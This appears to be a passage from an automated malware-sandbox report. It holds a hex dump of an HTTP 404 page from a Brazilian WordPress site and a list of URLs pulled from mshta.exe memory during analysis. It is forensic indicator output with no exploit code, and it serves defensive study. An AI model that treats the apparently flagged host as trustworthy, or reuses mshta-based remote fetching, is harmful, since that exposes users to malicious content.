2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 46 61 63 65 78 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 26 72 61 71 75 6f 3b 20 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 46 61 63 65 78 20 43 6f 6d c3 a9 72 63 69 6f 20 45 78 74 65 72 69 6f 72 20 4c 74 64 61 2e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 7
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Aug 2022 08:48:50 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"Content-Type: text/html; charset=UTF-8X-Varnish: 15664477Age: 0Via: 1.1 varnish-v4Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 30 30 31 30 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 36 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 46 61 63 65 78 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 26 72 61 71 75 6f 3b 20 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 46 61 63 65 78 20 43 6f 6d c3 a9 72 63 69 6f 20 45 78 74 65 72 69 6f 72 20 4c 74 64 61 2e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 7
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: https://www.youtube.com/watch?v=:id equals www.youtube.com (Youtube)
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: html.attr( 'src', '//www.youtube.com/embed/' + video.id + '?autoplay=1&rel=0&v=' + video.id ); equals www.youtube.com (Youtube)
Source: mshta.exe, 00000008.00000002.1171669328.0000000003C52000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1044882832.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: //www.youtube.com/embed//player?autoplay=true<div class="owl-video-frame" />?autoplay=1&rel=0&v=owl-video-playing//player.vimeo.com/video/ equals www.youtube.com (Youtube)
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comu equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000008.00000003.1031858409.0000000003580000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1169907186.0000000003580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \//www.youtube.com/embed/%id%?autoplay=1 equals www.youtube.com (Youtube)
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000008.00000002.1178082381.0000000006430000.00000004.00000020.00020000.00000000.sdmp, jquery.mousewheel.min[1].js.8.drString found in binary or memory: http://adomas.org/javascript-mouse-wheel/
Source: mshta.exe, 00000008.00000002.1178082381.0000000006430000.00000004.00000020.00020000.00000000.sdmp, jquery.mousewheel.min[1].js.8.drString found in binary or memory: http://brandonaaron.net)
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, swfobject[1].js.8.drString found in binary or memory: http://code.google.com/p/swfobject/
Source: mshta.exe, 00000008.00000003.939874043.000000000027F000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drString found in binary or memory: http://creativecommons.org/licenses/by/3.0/
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: animate-logo[1].css.8.drString found in binary or memory: http://daneden.me/animate
Source: mshta.exe, 00000008.00000002.1185019487.0000000009AA1000.00000004.00000020.00020000.00000000.sdmp, jquery.magnific-popup.min[1].js.8.drString found in binary or memory: http://dimsemenov.com/plugins/magnific-popup/
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.c
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/
Source: mshta.exe, 00000008.00000002.1178082381.0000000006430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/(c
Source: mshta.exe, 00000008.00000002.1178082381.0000000006430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/.clo
Source: mshta.exe, 00000008.00000002.1180881950.0000000006D13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/1L
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/a
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/a4g
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/css/banner-rotator.css?ver=4.9.20
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/css/banner-rotator.css?ver=4.9.20xZ
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/css/caption.css?ver=4.9.20
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/css/caption.css?ver=4.9.200C;
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20)
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20r=4.
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.flashblue-plugins.js?ver=4.9.20
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.flashblue-plugins.js?ver=4.9.20.
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165724575.000000000035E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/css/parallax.css?ver=1.0.0
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/css/parallax.css?ver=1.0.0.NET4.0E)
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/css/parallax.css?ver=1.0.0C:
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0.8.1oZ
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.00E)
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.00E)&
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0eT
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0g
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0.3
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0.NET4.0E)
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.00
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0S
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0er=3.0.6uZ
Source: mshta.exe, 00000008.00000002.1168275161.0000000002C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0http://facextr
Source: mshta.exe, 00000008.00000002.1180046658.0000000006802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0ll.min.js?ver=
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6
Source: mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.15k
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.18
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1L.
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1U
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1s?
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165831410.00000000003A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/flexslider.css?ver=2.2.0
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/fonts/flexslider-icon.eo
Source: mshta.exe, 00000008.00000002.1175277603.000000000528C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquery.flexslider-min.js
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/elasti-carousel/jquery.elastislide.
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.32.1
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3C:
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3I
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3a
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3alian
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3er=1.0.
Source: mshta.exe, 00000008.00000003.1043730529.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171490862.0000000003C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3http://
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165831410.00000000003A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.carousel.css?ver=1
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.theme.css?ver=1.24
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3
Source: mshta.exe, 00000008.00000002.1165724575.000000000035E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3)W
Source: mshta.exe, 00000008.00000002.1165724575.000000000035E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3.NET4.0E
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.38
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3C:
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.30.6
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.30E)
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3C:
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3ET4.0E)
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3yI
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/arrow_down.png
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/arrow_down.png&h
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/arrow_down.png0h
Source: mshta.exe, 00000008.00000002.1165724575.000000000035E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/arrow_down.pngs?ver=1.0=1.0l
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/arrow_down.png~h
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.png
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.png5501425981.pngn.js.3.0rl
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20.2
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20C:
